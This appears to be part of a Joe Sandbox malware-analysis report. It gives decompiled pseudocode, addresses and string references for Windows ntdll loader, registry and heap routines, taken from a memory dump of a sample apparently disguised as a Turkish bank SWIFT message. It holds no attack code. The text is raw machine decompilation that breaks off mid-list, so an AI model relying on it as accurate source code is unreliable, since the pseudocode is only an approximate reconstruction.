                                                                    C-Code - Quality: 98%
                                                                    			E018A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v24;
                                                                    				signed int _t73;
                                                                    				void* _t77;
                                                                    				char* _t82;
                                                                    				char* _t87;
                                                                    				signed char* _t97;
                                                                    				signed char _t102;
                                                                    				intOrPtr _t107;
                                                                    				signed char* _t108;
                                                                    				intOrPtr _t112;
                                                                    				intOrPtr _t124;
                                                                    				intOrPtr _t125;
                                                                    				intOrPtr _t126;
                                                                    
                                                                    				_t107 = __edx;
                                                                    				_v12 = __ecx;
                                                                    				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                    				_t124 = 0;
                                                                    				_v20 = __edx;
                                                                    				if(E018ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                    					_t112 = _v8;
                                                                    				} else {
                                                                    					_t112 = 0;
                                                                    					_v8 = 0;
                                                                    				}
                                                                    				if(_t112 != 0) {
                                                                    					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                    						_t124 = 0xc000007b;
                                                                    						goto L8;
                                                                    					}
                                                                    					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                    					 *(_t125 + 0x34) = _t73;
                                                                    					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                    					_t124 = E0189C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                    					if(_t124 < 0) {
                                                                    						goto L8;
                                                                    					} else {
                                                                    						goto L3;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                    						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                    						L8:
                                                                    						return _t124;
                                                                    					}
                                                                    					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                    						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                    							goto L5;
                                                                    						}
                                                                    						_t102 =  *0x1985780; // 0x0
                                                                    						if((_t102 & 0x00000003) != 0) {
                                                                    							E01915510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                    							_t102 =  *0x1985780; // 0x0
                                                                    						}
                                                                    						if((_t102 & 0x00000010) != 0) {
                                                                    							asm("int3");
                                                                    						}
                                                                    						_t124 = 0xc0000428;
                                                                    						goto L8;
                                                                    					}
                                                                    					L5:
                                                                    					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                    						goto L8;
                                                                    					}
                                                                    					_t77 = _a4 - 0x40000003;
                                                                    					if(_t77 == 0 || _t77 == 0x33) {
                                                                    						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                    						if(E018B7D50() != 0) {
                                                                    							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    						} else {
                                                                    							_t82 = 0x7ffe0384;
                                                                    						}
                                                                    						_t108 = 0x7ffe0385;
                                                                    						if( *_t82 != 0) {
                                                                    							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                    								if(E018B7D50() == 0) {
                                                                    									_t97 = 0x7ffe0385;
                                                                    								} else {
                                                                    									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    								}
                                                                    								if(( *_t97 & 0x00000020) != 0) {
                                                                    									E01917016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						if(_a4 != 0x40000003) {
                                                                    							L14:
                                                                    							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                    							if(E018B7D50() != 0) {
                                                                    								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    							} else {
                                                                    								_t87 = 0x7ffe0384;
                                                                    							}
                                                                    							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                    								if(E018B7D50() != 0) {
                                                                    									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    								}
                                                                    								if(( *_t108 & 0x00000020) != 0) {
                                                                    									E01917016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                    								}
                                                                    							}
                                                                    							goto L8;
                                                                    						} else {
                                                                    							_v16 = _t125 + 0x24;
                                                                    							_t124 = E018CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                    							if(_t124 < 0) {
                                                                    								E0189B1E1(_t124, 0x1490, 0, _v16);
                                                                    								goto L8;
                                                                    							}
                                                                    							goto L14;
                                                                    						}
                                                                    					} else {
                                                                    						goto L8;
                                                                    					}
                                                                    				}
                                                                    			}




















                                                                    0x018a7e4c
                                                                    0x018a7e50
                                                                    0x018a7e55
                                                                    0x018a7e58
                                                                    0x018a7e5d
                                                                    0x018a7e71
                                                                    0x018a7f33
                                                                    0x018a7e77
                                                                    0x018a7e77
                                                                    0x018a7e79
                                                                    0x018a7e79
                                                                    0x018a7e7e
                                                                    0x018a7f45
                                                                    0x018f9848
                                                                    0x00000000
                                                                    0x018f9848
                                                                    0x018a7f4e
                                                                    0x018a7f53
                                                                    0x018a7f5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f985a
                                                                    0x018f9862
                                                                    0x018f9866
                                                                    0x00000000
                                                                    0x018f986c
                                                                    0x00000000
                                                                    0x018f986c
                                                                    0x018a7e84
                                                                    0x018a7e84
                                                                    0x018a7e8d
                                                                    0x018f9871
                                                                    0x018a7eb8
                                                                    0x018a7ec0
                                                                    0x018a7ec0
                                                                    0x018a7e9a
                                                                    0x018f987e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f9884
                                                                    0x018f988b
                                                                    0x018f98a7
                                                                    0x018f98ac
                                                                    0x018f98b1
                                                                    0x018f98b6
                                                                    0x018f98b8
                                                                    0x018f98b8
                                                                    0x018f98b9
                                                                    0x00000000
                                                                    0x018f98b9
                                                                    0x018a7ea0
                                                                    0x018a7ea7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a7eac
                                                                    0x018a7eb1
                                                                    0x018a7ec6
                                                                    0x018a7ed0
                                                                    0x018f98cc
                                                                    0x018a7ed6
                                                                    0x018a7ed6
                                                                    0x018a7ed6
                                                                    0x018a7ede
                                                                    0x018a7ee3
                                                                    0x018f98e3
                                                                    0x018f98f0
                                                                    0x018f9902
                                                                    0x018f98f2
                                                                    0x018f98fb
                                                                    0x018f98fb
                                                                    0x018f9907
                                                                    0x018f991d
                                                                    0x018f991d
                                                                    0x018f9907
                                                                    0x018f98e3
                                                                    0x018a7ef0
                                                                    0x018a7f14
                                                                    0x018a7f14
                                                                    0x018a7f1e
                                                                    0x018f9946
                                                                    0x018a7f24
                                                                    0x018a7f24
                                                                    0x018a7f24
                                                                    0x018a7f2c
                                                                    0x018f996a
                                                                    0x018f9975
                                                                    0x018f9975
                                                                    0x018f997e
                                                                    0x018f9993
                                                                    0x018f9993
                                                                    0x018f997e
                                                                    0x00000000
                                                                    0x018a7ef2
                                                                    0x018a7efc
                                                                    0x018a7f0a
                                                                    0x018a7f0e
                                                                    0x018f9933
                                                                    0x00000000
                                                                    0x018f9933
                                                                    0x00000000
                                                                    0x018a7f0e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a7eb1

                                                                    Strings
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 018F98A2
                                                                    • LdrpCompleteMapModule, xrefs: 018F9898
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 018F9891
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                                                                    • Instruction ID: 34b6712a80e575cbdccda5a8111dacd282351554daed2dfe6d83abdae06b8030
                                                                    • Opcode Fuzzy Hash: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                                                                    • Instruction Fuzzy Hash: E851E031A0078A9BFB21CB6CC984B6A7BE4AB41B18F840599EB51DB3D1D735EF00C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E0189E620(void* __ecx, short* __edx, short* _a4) {
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				intOrPtr _v24;
                                                                    				char* _v28;
                                                                    				char _v32;
                                                                    				char _v36;
                                                                    				char _v44;
                                                                    				signed int _v48;
                                                                    				intOrPtr _v52;
                                                                    				void* _v56;
                                                                    				void* _v60;
                                                                    				char _v64;
                                                                    				void* _v68;
                                                                    				void* _v76;
                                                                    				void* _v84;
                                                                    				signed int _t59;
                                                                    				signed int _t74;
                                                                    				signed short* _t75;
                                                                    				signed int _t76;
                                                                    				signed short* _t78;
                                                                    				signed int _t83;
                                                                    				short* _t93;
                                                                    				signed short* _t94;
                                                                    				short* _t96;
                                                                    				void* _t97;
                                                                    				signed int _t99;
                                                                    				void* _t101;
                                                                    				void* _t102;
                                                                    
                                                                    				_t80 = __ecx;
                                                                    				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                    				_t96 = __edx;
                                                                    				_v44 = __edx;
                                                                    				_t78 = 0;
                                                                    				_v56 = 0;
                                                                    				if(__ecx == 0 || __edx == 0) {
                                                                    					L28:
                                                                    					_t97 = 0xc000000d;
                                                                    				} else {
                                                                    					_t93 = _a4;
                                                                    					if(_t93 == 0) {
                                                                    						goto L28;
                                                                    					}
                                                                    					_t78 = E0189F358(__ecx, 0xac);
                                                                    					if(_t78 == 0) {
                                                                    						_t97 = 0xc0000017;
                                                                    						L6:
                                                                    						if(_v56 != 0) {
                                                                    							_push(_v56);
                                                                    							E018D95D0();
                                                                    						}
                                                                    						if(_t78 != 0) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                    						}
                                                                    						return _t97;
                                                                    					}
                                                                    					E018DFA60(_t78, 0, 0x158);
                                                                    					_v48 = _v48 & 0x00000000;
                                                                    					_t102 = _t101 + 0xc;
                                                                    					 *_t96 = 0;
                                                                    					 *_t93 = 0;
                                                                    					E018DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                    					_v36 = 0x18;
                                                                    					_v28 =  &_v44;
                                                                    					_v64 = 0;
                                                                    					_push( &_v36);
                                                                    					_push(0x20019);
                                                                    					_v32 = 0;
                                                                    					_push( &_v64);
                                                                    					_v24 = 0x40;
                                                                    					_v20 = 0;
                                                                    					_v16 = 0;
                                                                    					_t97 = E018D9600();
                                                                    					if(_t97 < 0) {
                                                                    						goto L6;
                                                                    					}
                                                                    					E018DBB40(0,  &_v36, L"InstallLanguageFallback");
                                                                    					_push(0);
                                                                    					_v48 = 4;
                                                                    					_t97 = L0189F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                    					if(_t97 >= 0) {
                                                                    						if(_v52 != 1) {
                                                                    							L17:
                                                                    							_t97 = 0xc0000001;
                                                                    							goto L6;
                                                                    						}
                                                                    						_t59 =  *_t78 & 0x0000ffff;
                                                                    						_t94 = _t78;
                                                                    						_t83 = _t59;
                                                                    						if(_t59 == 0) {
                                                                    							L19:
                                                                    							if(_t83 == 0) {
                                                                    								L23:
                                                                    								E018DBB40(_t83, _t102 + 0x24, _t78);
                                                                    								if(L018A43C0( &_v48,  &_v64) == 0) {
                                                                    									goto L17;
                                                                    								}
                                                                    								_t84 = _v48;
                                                                    								 *_v48 = _v56;
                                                                    								if( *_t94 != 0) {
                                                                    									E018DBB40(_t84, _t102 + 0x24, _t94);
                                                                    									if(L018A43C0( &_v48,  &_v64) != 0) {
                                                                    										 *_a4 = _v56;
                                                                    									} else {
                                                                    										_t97 = 0xc0000001;
                                                                    										 *_v48 = 0;
                                                                    									}
                                                                    								}
                                                                    								goto L6;
                                                                    							}
                                                                    							_t83 = _t83 & 0x0000ffff;
                                                                    							while(_t83 == 0x20) {
                                                                    								_t94 =  &(_t94[1]);
                                                                    								_t74 =  *_t94 & 0x0000ffff;
                                                                    								_t83 = _t74;
                                                                    								if(_t74 != 0) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L23;
                                                                    							}
                                                                    							goto L23;
                                                                    						} else {
                                                                    							goto L14;
                                                                    						}
                                                                    						while(1) {
                                                                    							L14:
                                                                    							_t27 =  &(_t94[1]); // 0x2
                                                                    							_t75 = _t27;
                                                                    							if(_t83 == 0x2c) {
                                                                    								break;
                                                                    							}
                                                                    							_t94 = _t75;
                                                                    							_t76 =  *_t94 & 0x0000ffff;
                                                                    							_t83 = _t76;
                                                                    							if(_t76 != 0) {
                                                                    								continue;
                                                                    							}
                                                                    							goto L23;
                                                                    						}
                                                                    						 *_t94 = 0;
                                                                    						_t94 = _t75;
                                                                    						_t83 =  *_t75 & 0x0000ffff;
                                                                    						goto L19;
                                                                    					}
                                                                    				}
                                                                    			}































                                                                    0x0189e620
                                                                    0x0189e628
                                                                    0x0189e62f
                                                                    0x0189e631
                                                                    0x0189e635
                                                                    0x0189e637
                                                                    0x0189e63e
                                                                    0x018f5503
                                                                    0x018f5503
                                                                    0x0189e64c
                                                                    0x0189e64c
                                                                    0x0189e651
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0189e661
                                                                    0x0189e665
                                                                    0x018f542a
                                                                    0x0189e715
                                                                    0x0189e71a
                                                                    0x0189e71c
                                                                    0x0189e720
                                                                    0x0189e720
                                                                    0x0189e727
                                                                    0x0189e736
                                                                    0x0189e736
                                                                    0x0189e743
                                                                    0x0189e743
                                                                    0x0189e673
                                                                    0x0189e678
                                                                    0x0189e67d
                                                                    0x0189e682
                                                                    0x0189e685
                                                                    0x0189e692
                                                                    0x0189e69b
                                                                    0x0189e6a3
                                                                    0x0189e6ad
                                                                    0x0189e6b1
                                                                    0x0189e6b2
                                                                    0x0189e6bb
                                                                    0x0189e6bf
                                                                    0x0189e6c0
                                                                    0x0189e6c8
                                                                    0x0189e6cc
                                                                    0x0189e6d5
                                                                    0x0189e6d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0189e6e5
                                                                    0x0189e6ea
                                                                    0x0189e6f9
                                                                    0x0189e70b
                                                                    0x0189e70f
                                                                    0x018f5439
                                                                    0x018f545e
                                                                    0x018f545e
                                                                    0x00000000
                                                                    0x018f545e
                                                                    0x018f543b
                                                                    0x018f543e
                                                                    0x018f5440
                                                                    0x018f5445
                                                                    0x018f5472
                                                                    0x018f5475
                                                                    0x018f548d
                                                                    0x018f5493
                                                                    0x018f54a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f54ab
                                                                    0x018f54b4
                                                                    0x018f54bc
                                                                    0x018f54c8
                                                                    0x018f54de
                                                                    0x018f54fb
                                                                    0x018f54e0
                                                                    0x018f54e6
                                                                    0x018f54eb
                                                                    0x018f54eb
                                                                    0x018f54de
                                                                    0x00000000
                                                                    0x018f54bc
                                                                    0x018f5477
                                                                    0x018f547a
                                                                    0x018f5480
                                                                    0x018f5483
                                                                    0x018f5486
                                                                    0x018f548b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f548b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f5447
                                                                    0x018f5447
                                                                    0x018f5447
                                                                    0x018f5447
                                                                    0x018f544e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f5450
                                                                    0x018f5452
                                                                    0x018f5455
                                                                    0x018f545a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f545c
                                                                    0x018f546a
                                                                    0x018f546d
                                                                    0x018f546f
                                                                    0x00000000
                                                                    0x018f546f
                                                                    0x0189e70f

                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0189E68C
                                                                    • InstallLanguageFallback, xrefs: 0189E6DB
                                                                    • @, xrefs: 0189E6C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                                                                    • Instruction ID: 9411817b6550f3184ed7d93474d7a0333b8afc6b411e900f1cabd68c891a1fd0
                                                                    • Opcode Fuzzy Hash: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                                                                    • Instruction Fuzzy Hash: 0B517FB26083469BDB14DF68C480A6BB7E8BF98715F45092EFA85D7240F734DB04C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0192FF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 3446177414-1911121157
                                                                    • Opcode ID: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                                                                    • Instruction ID: 005ba546abf523da495e4ba0bdf3a2475e2f76e94429b83c5d0d07ce755fe3a9
                                                                    • Opcode Fuzzy Hash: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                                                                    • Instruction Fuzzy Hash: 9C110471910154EFEB22EF58C948FD8BBB1FF09705F158044E5089B265C7389A44CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 60%
                                                                    			E0195E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				signed int _v40;
                                                                    				char _v44;
                                                                    				intOrPtr _v48;
                                                                    				signed int _v52;
                                                                    				unsigned int _v56;
                                                                    				char _v60;
                                                                    				signed int _v64;
                                                                    				char _v68;
                                                                    				signed int _v72;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				char _t87;
                                                                    				signed int _t90;
                                                                    				signed int _t94;
                                                                    				signed int _t100;
                                                                    				intOrPtr* _t113;
                                                                    				signed int _t122;
                                                                    				void* _t132;
                                                                    				void* _t135;
                                                                    				signed int _t139;
                                                                    				signed int* _t141;
                                                                    				signed int _t146;
                                                                    				signed int _t147;
                                                                    				void* _t153;
                                                                    				signed int _t155;
                                                                    				signed int _t159;
                                                                    				char _t166;
                                                                    				void* _t172;
                                                                    				void* _t176;
                                                                    				signed int _t177;
                                                                    				intOrPtr* _t179;
                                                                    
                                                                    				_t179 = __ecx;
                                                                    				_v48 = __edx;
                                                                    				_v68 = 0;
                                                                    				_v72 = 0;
                                                                    				_push(__ecx[1]);
                                                                    				_push( *__ecx);
                                                                    				_push(0);
                                                                    				_t153 = 0x14;
                                                                    				_t135 = _t153;
                                                                    				_t132 = E0195BBBB(_t135, _t153);
                                                                    				if(_t132 == 0) {
                                                                    					_t166 = _v68;
                                                                    					goto L43;
                                                                    				} else {
                                                                    					_t155 = 0;
                                                                    					_v52 = 0;
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					_v56 = __ecx[1];
                                                                    					if( *__ecx >> 8 < 2) {
                                                                    						_t155 = 1;
                                                                    						_v52 = 1;
                                                                    					}
                                                                    					_t139 = _a4;
                                                                    					_t87 = (_t155 << 0xc) + _t139;
                                                                    					_v60 = _t87;
                                                                    					if(_t87 < _t139) {
                                                                    						L11:
                                                                    						_t166 = _v68;
                                                                    						L12:
                                                                    						if(_t132 != 0) {
                                                                    							E0195BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                    						}
                                                                    						L43:
                                                                    						if(_v72 != 0) {
                                                                    							_push( *((intOrPtr*)(_t179 + 4)));
                                                                    							_push( *_t179);
                                                                    							_push(0x8000);
                                                                    							E0195AFDE( &_v72,  &_v60);
                                                                    						}
                                                                    						L46:
                                                                    						return _t166;
                                                                    					}
                                                                    					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                    					asm("sbb edi, edi");
                                                                    					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                    					if(_t90 != 0) {
                                                                    						_push(0);
                                                                    						_push(0x14);
                                                                    						_push( &_v44);
                                                                    						_push(3);
                                                                    						_push(_t179);
                                                                    						_push(0xffffffff);
                                                                    						if(E018D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                    							_push(_t139);
                                                                    							E0195A80D(_t179, 1, _v40, 0);
                                                                    							_t172 = 4;
                                                                    						}
                                                                    					}
                                                                    					_t141 =  &_v72;
                                                                    					if(E0195A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                    						_v64 = _a4;
                                                                    						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                    						asm("sbb edi, edi");
                                                                    						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                    						if(_t94 != 0) {
                                                                    							_push(0);
                                                                    							_push(0x14);
                                                                    							_push( &_v24);
                                                                    							_push(3);
                                                                    							_push(_t179);
                                                                    							_push(0xffffffff);
                                                                    							if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                    								_push(_t141);
                                                                    								E0195A80D(_t179, 1, _v20, 0);
                                                                    								_t176 = 4;
                                                                    							}
                                                                    						}
                                                                    						if(E0195A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                    							goto L11;
                                                                    						} else {
                                                                    							_t177 = _v64;
                                                                    							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                    							_t100 = _v52 + _v52;
                                                                    							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                    							 *(_t132 + 0x10) = _t146;
                                                                    							asm("bsf eax, [esp+0x18]");
                                                                    							_v52 = _t100;
                                                                    							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                    							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                    							_t47 =  &_a8;
                                                                    							 *_t47 = _a8 & 0x00000001;
                                                                    							if( *_t47 == 0) {
                                                                    								E018B2280(_t179 + 0x30, _t179 + 0x30);
                                                                    							}
                                                                    							_t147 =  *(_t179 + 0x34);
                                                                    							_t159 =  *(_t179 + 0x38) & 1;
                                                                    							_v68 = 0;
                                                                    							if(_t147 == 0) {
                                                                    								L35:
                                                                    								E018AB090(_t179 + 0x34, _t147, _v68, _t132);
                                                                    								if(_a8 == 0) {
                                                                    									E018AFFB0(_t132, _t177, _t179 + 0x30);
                                                                    								}
                                                                    								asm("lock xadd [eax], ecx");
                                                                    								asm("lock xadd [eax], edx");
                                                                    								_t132 = 0;
                                                                    								_v72 = _v72 & 0;
                                                                    								_v68 = _v72;
                                                                    								if(E018B7D50() == 0) {
                                                                    									_t113 = 0x7ffe0388;
                                                                    								} else {
                                                                    									_t177 = _v64;
                                                                    									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    								}
                                                                    								if( *_t113 == _t132) {
                                                                    									_t166 = _v68;
                                                                    									goto L46;
                                                                    								} else {
                                                                    									_t166 = _v68;
                                                                    									E0194FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                    									goto L12;
                                                                    								}
                                                                    							} else {
                                                                    								L23:
                                                                    								while(1) {
                                                                    									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                    										_t122 =  *_t147;
                                                                    										if(_t159 == 0) {
                                                                    											L32:
                                                                    											if(_t122 == 0) {
                                                                    												L34:
                                                                    												_v68 = 0;
                                                                    												goto L35;
                                                                    											}
                                                                    											L33:
                                                                    											_t147 = _t122;
                                                                    											continue;
                                                                    										}
                                                                    										if(_t122 == 0) {
                                                                    											goto L34;
                                                                    										}
                                                                    										_t122 = _t122 ^ _t147;
                                                                    										goto L32;
                                                                    									}
                                                                    									_t122 =  *(_t147 + 4);
                                                                    									if(_t159 == 0) {
                                                                    										L27:
                                                                    										if(_t122 != 0) {
                                                                    											goto L33;
                                                                    										}
                                                                    										L28:
                                                                    										_v68 = 1;
                                                                    										goto L35;
                                                                    									}
                                                                    									if(_t122 == 0) {
                                                                    										goto L28;
                                                                    									}
                                                                    									_t122 = _t122 ^ _t147;
                                                                    									goto L27;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_v72 = _v72 & 0x00000000;
                                                                    					goto L11;
                                                                    				}
                                                                    			}




































                                                                    0x0195e547
                                                                    0x0195e549
                                                                    0x0195e54f
                                                                    0x0195e553
                                                                    0x0195e557
                                                                    0x0195e55a
                                                                    0x0195e55c
                                                                    0x0195e55f
                                                                    0x0195e561
                                                                    0x0195e567
                                                                    0x0195e56b
                                                                    0x0195e7e2
                                                                    0x00000000
                                                                    0x0195e571
                                                                    0x0195e575
                                                                    0x0195e577
                                                                    0x0195e57b
                                                                    0x0195e57c
                                                                    0x0195e57d
                                                                    0x0195e57e
                                                                    0x0195e57f
                                                                    0x0195e588
                                                                    0x0195e58f
                                                                    0x0195e591
                                                                    0x0195e592
                                                                    0x0195e592
                                                                    0x0195e596
                                                                    0x0195e59e
                                                                    0x0195e5a0
                                                                    0x0195e5a6
                                                                    0x0195e61d
                                                                    0x0195e61d
                                                                    0x0195e621
                                                                    0x0195e623
                                                                    0x0195e630
                                                                    0x0195e630
                                                                    0x0195e7e6
                                                                    0x0195e7eb
                                                                    0x0195e7ed
                                                                    0x0195e7f4
                                                                    0x0195e7fa
                                                                    0x0195e7ff
                                                                    0x0195e7ff
                                                                    0x0195e80a
                                                                    0x0195e812
                                                                    0x0195e812
                                                                    0x0195e5ab
                                                                    0x0195e5b4
                                                                    0x0195e5b9
                                                                    0x0195e5be
                                                                    0x0195e5c0
                                                                    0x0195e5c2
                                                                    0x0195e5c8
                                                                    0x0195e5c9
                                                                    0x0195e5cb
                                                                    0x0195e5cc
                                                                    0x0195e5d5
                                                                    0x0195e5e4
                                                                    0x0195e5f1
                                                                    0x0195e5f8
                                                                    0x0195e5f8
                                                                    0x0195e5d5
                                                                    0x0195e602
                                                                    0x0195e616
                                                                    0x0195e63d
                                                                    0x0195e644
                                                                    0x0195e64d
                                                                    0x0195e652
                                                                    0x0195e657
                                                                    0x0195e659
                                                                    0x0195e65b
                                                                    0x0195e661
                                                                    0x0195e662
                                                                    0x0195e664
                                                                    0x0195e665
                                                                    0x0195e66e
                                                                    0x0195e67d
                                                                    0x0195e68a
                                                                    0x0195e691
                                                                    0x0195e691
                                                                    0x0195e66e
                                                                    0x0195e6b0
                                                                    0x00000000
                                                                    0x0195e6b6
                                                                    0x0195e6bd
                                                                    0x0195e6c7
                                                                    0x0195e6d7
                                                                    0x0195e6d9
                                                                    0x0195e6db
                                                                    0x0195e6de
                                                                    0x0195e6e3
                                                                    0x0195e6f3
                                                                    0x0195e6fc
                                                                    0x0195e700
                                                                    0x0195e700
                                                                    0x0195e704
                                                                    0x0195e70a
                                                                    0x0195e70a
                                                                    0x0195e713
                                                                    0x0195e716
                                                                    0x0195e719
                                                                    0x0195e720
                                                                    0x0195e761
                                                                    0x0195e76b
                                                                    0x0195e774
                                                                    0x0195e77a
                                                                    0x0195e77a
                                                                    0x0195e78a
                                                                    0x0195e791
                                                                    0x0195e799
                                                                    0x0195e79b
